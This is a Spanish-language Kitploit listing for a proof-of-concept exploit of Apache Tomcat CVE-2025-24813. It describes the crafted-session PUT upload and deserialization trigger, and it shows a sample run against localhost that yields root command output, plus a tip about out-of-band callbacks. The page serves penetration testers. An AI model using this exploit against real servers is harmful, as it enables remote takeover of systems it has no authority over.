Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-24813-PoC-exploit — Prueba de concepto de exploit para RCE por deserialización en Apache Tomcat (CVE-2025-24813). Sube un archivo de sesión manipulado mediante una solicitud PUT y desencadena la deserialización para ejecutar comandos arbitrarios en el servidor objetivo. | Kitploit
Herramientas/GitHubGitHub/gunyakit/cve-2025-24813-poc-exploit
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso RemotoDesarrollo de Payloads
GitHubgunyakit/cve-2025-24813-poc-exploit

CVE-2025-24813-PoC-exploit

Prueba de concepto de exploit para RCE por deserialización en Apache Tomcat (CVE-2025-24813). Sube un archivo de sesión manipulado mediante una solicitud PUT y desencadena la deserialización para ejecutar comandos arbitrarios en el servidor objetivo.

Ver Repositorio
9hace 9 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-24813-PoC-exploit

Apache Tomcat Deserialización RCE

root@kitploit:~
❯ python3 exploit.py http://localhost:8080/ "id"
============================================================
CVE-2025-24813 - Apache Tomcat RCE mediante PUT Parcial
============================================================

[*] Objetivo: http://localhost:8080
[*] Comando: id

[*] Creando payload de exploit...
[*] Subiendo payload mediante PUT a: http://localhost:8080/session/exploit.session
[*] Respuesta PUT: 201
[+] ¡Payload subido exitosamente!

[*] Disparando deserialización...
[*] Respuesta Trigger: 200

[*] Cuerpo de respuesta:

<!DOCTYPE html>
<html>
<head><title>¡Deserialización Activada!</title></head>
<body style="background:#1a1a2e;color:#e0e0e0;font-family:monospace;padding:2rem;">
<h1 style="color:#ef4444;">⚠️ ¡Deserialización RCE Activada!</h1>
<p>Archivo de sesión deserializado: exploit.session</p>
<p>Comando ejecutado: <code style="color:#4ade80;">id</code></p>
<hr>
<pre style="background:#0a0a0a;padding:1rem;border-radius:8px;color:#00d4ff;">
uid=0(root) gid=0(root) groups=0(root)

</pre>
</body>
</html>


[*] ¡Exploit completado!

Si la deserialización funcionó, verifica el objetivo para la ejecución del comando.
Para RCE ciego, usa técnicas fuera de banda (callbacks DNS/HTTP)
Descargar herramienta